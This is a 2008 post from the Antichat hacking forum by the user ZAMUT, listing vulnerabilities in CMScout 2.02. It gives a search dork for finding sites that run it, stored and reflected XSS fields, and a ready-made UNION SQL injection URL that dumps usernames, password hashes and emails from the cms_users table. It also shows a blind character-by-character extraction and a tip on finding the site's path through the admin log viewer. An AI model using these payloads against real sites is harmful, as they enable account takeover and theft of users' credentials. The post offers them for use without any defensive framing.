ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу CMScout
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

CMScout
  #1  
Старый 03.03.2008, 04:29
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию CMScout
CMScout

Site: http://cmscout.co.za
Version: 2.02
Dork: "Powered by CMScout"

Active XSS:
CMScout 2.02 forums >> Test Forum >> New Topic
Уязвимые поля: "Subject", "Description"
User Control Panel >> Profile
Уязвимые поля: "First Name", "Last Name", "Contributions"
CMScout Administration
Download Manager
Уязвимые поля:
"Name"
Photo Album Manager
Уязвимые поля: "Name"
Passive XSS
Код:
/index.php?page=forums&f=1&menuid=3[xss]
Remote SQL Injection:
Код:
/admin.php?page=users&subpage=users_view&id=-1+union+select+1,2,concat_ws(0x3a,uname,passwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+cms_users/*
Нету вывода - забираем данные посимвольно.
Код:
/admin.php?page=group&action=auth&id=1+and+substring(version(),1,1)=5/*
Чтобы узнать полный путь к сайту, можно, как вариант посмотреть логи:

CMScout Administration >> Logfile viewer

(с) ZAMUT
Последний раз редактировалось ZAMUT; 12.07.2008 в 15:57..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ